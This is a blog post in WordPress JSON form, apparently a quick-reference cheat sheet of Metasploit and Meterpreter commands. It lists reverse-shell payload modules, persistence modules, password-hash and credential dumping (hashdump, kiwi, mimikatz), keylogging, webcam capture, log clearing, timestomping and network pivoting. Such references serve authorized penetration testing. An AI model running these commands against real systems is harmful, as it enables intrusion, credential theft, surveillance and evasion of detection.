{"id":1083,"date":"2021-02-08T19:58:45","date_gmt":"2021-02-08T19:58:45","guid":{"rendered":"https:\/\/dft.wiki\/?p=1083"},"modified":"2022-01-01T19:13:00","modified_gmt":"2022-01-01T19:13:00","slug":"metasploit-meterpreter-cheat-sheet","status":"publish","type":"post","link":"https:\/\/dft.wiki\/?p=1083","title":{"rendered":"Metasploit + Meterpreter Cheat Sheet"},"content":{"rendered":"<p><strong>Metasploit Cheat Sheet<\/strong><\/p>\n<ul>\n<li>service postgresql start<\/li>\n<li>msfdb init<\/li>\n<li>msfconsole -q\n<ul>\n<li>db_status<\/li>\n<li>db_nmap -sn [&#8230;] \/ db_nmap -T4 -A -v [&#8230;]<\/li>\n<li>show<\/li>\n<li>info [&#8230;]<\/li>\n<li>use [&#8230;]\n<ul>\n<li>info<\/li>\n<li>options<\/li>\n<li>payloads<\/li>\n<li>targets<\/li>\n<li>run \/ exploit \/ exploit -j -z\n<ul>\n<li>Ctrl+Z<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<li>jobs<\/li>\n<li>sessions<\/li>\n<li>sessions -i #<\/li>\n<li>search [&#8230;]<\/li>\n<li>spool<\/li>\n<li>post<\/li>\n<li>load<\/li>\n<li>db_map -sV 10.10.10.10\n<ul>\n<li>hosts<\/li>\n<li>services<\/li>\n<li>vulns<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<li>searchsploit [&#8230;]<\/li>\n<\/ul>\n<p><strong>Metasploit Global Variables<\/strong><\/p>\n<ul>\n<li>setg HOST 10.10.10.10<\/li>\n<li>setg PORT 8888<\/li>\n<li>get HOST<\/li>\n<li>unset HOST<\/li>\n<\/ul>\n<p><strong>Metasploit Popular Modules<\/strong><\/p>\n<ul>\n<li>exploit\/multi\/handle<\/li>\n<li>payload\/windows\/x64\/meterpreter_reverse_tcp<\/li>\n<li>payload\/windows\/meterpreter\/reverse_tcp<\/li>\n<li>post\/win\/gather\/hashdump<\/li>\n<li>post\/windows\/manage\/migrate<\/li>\n<li>exploit\/windows\/local\/persistence<\/li>\n<li>exploit\/windows\/local\/registry_persistence<\/li>\n<li>post\/multi\/recon\/local_exploit_suggester<\/li>\n<li>post\/windows\/gather\/checkvm<\/li>\n<li>post\/windows\/manage\/enable_rdp<\/li>\n<li>post\/multi\/manage\/shell_to_meterpreter<\/li>\n<li>auxiliary\/server\/socks5<\/li>\n<\/ul>\n<p><strong>Meterpreter Cheat Sheet<\/strong><\/p>\n<ul>\n<li>help<\/li>\n<li>background<\/li>\n<li>bgrun<\/li>\n<li>bglist<\/li>\n<li>bgkill<\/li>\n<li>cat<\/li>\n<li>del<\/li>\n<li>timestomp<\/li>\n<li>pwd<\/li>\n<li>clearev<\/li>\n<li>download c:\\\\boot.ini<\/li>\n<li>upload trojan.exe c:\\\\windows\\\\system32<\/li>\n<li>edit edit.txt<\/li>\n<li>execute -f cmd.exe -i -H<\/li>\n<li>resource resource.txt<\/li>\n<li>search -f autoexec.bat \/\u00a0search -f sea*.bat c:\\\\xamp\\\\<\/li>\n<li>getuid<\/li>\n<li>idletime<\/li>\n<li>ipconfig<\/li>\n<li>portfwd<\/li>\n<li>route<\/li>\n<li>sysinfo<\/li>\n<li>hashdump<\/li>\n<li>getsystem<\/li>\n<li>exploit<\/li>\n<li>interact<\/li>\n<li>ps<\/li>\n<li>ipconfig<\/li>\n<li>source<\/li>\n<li>shell<\/li>\n<li>lcd<\/li>\n<li>lpwd<\/li>\n<li>lls<\/li>\n<li>migrate PID<\/li>\n<li>keyscan_start<\/li>\n<li>keyscan_stop<\/li>\n<li>keyscan_dump<\/li>\n<li>screenshot<\/li>\n<li>webcam_list<\/li>\n<li>webcam_snap<\/li>\n<li>load incognito\n<ul>\n<li>list tokens -u<\/li>\n<li>list tokens -g<\/li>\n<li>impersonate_token \\\\WORKGROUP\\Administrator<\/li>\n<\/ul>\n<\/li>\n<li>load kiwi\n<ul>\n<li>help<\/li>\n<li>getprivs<\/li>\n<li>creds_all\n<ul>\n<li>Syntax USER:RELATIVE_IDENTIFIER:LM:NT<\/li>\n<\/ul>\n<\/li>\n<li>rev2self<\/li>\n<li>upload fileName<\/li>\n<\/ul>\n<\/li>\n<li>load mimikats\n<ul>\n<li>help<\/li>\n<li>kerberos<\/li>\n<\/ul>\n<\/li>\n<li>run persistence -h<\/li>\n<li>run netsvc -A<\/li>\n<li>run autoroute -s 10.0.0.0\/24<\/li>\n<li>run autoroute -s 172.16.0.0 -n 255.255.0.0<\/li>\n<li>run autoroute -p<\/li>\n<li>run post\/multi\/recon\/local_exploit_suggester<\/li>\n<li>run post\/windows\/manage\/enable_rdp<\/li>\n<li>run auxiliary\/server\/socks5<\/li>\n<li>Ctrl+Z\n<ul>\n<li>use post\/multi\/manage\/shell_to_meterpreter<\/li>\n<li>set session 1<\/li>\n<li>run<\/li>\n<li>hashdump<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n","protected":false},"excerpt":{"rendered":"<p>Metasploit Cheat Sheet service postgresql start msfdb init msfconsole -q db_status db_nmap -sn [&#8230;] \/ [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[9],"tags":[],"class_list":["post-1083","post","type-post","status-publish","format-standard","hentry","category-hacking"],"_links":{"self":[{"href":"https:\/\/dft.wiki\/index.php?rest_route=\/wp\/v2\/posts\/1083","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/dft.wiki\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/dft.wiki\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/dft.wiki\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/dft.wiki\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1083"}],"version-history":[{"count":5,"href":"https:\/\/dft.wiki\/index.php?rest_route=\/wp\/v2\/posts\/1083\/revisions"}],"predecessor-version":[{"id":2646,"href":"https:\/\/dft.wiki\/index.php?rest_route=\/wp\/v2\/posts\/1083\/revisions\/2646"}],"wp:attachment":[{"href":"https:\/\/dft.wiki\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1083"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/dft.wiki\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1083"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/dft.wiki\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1083"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}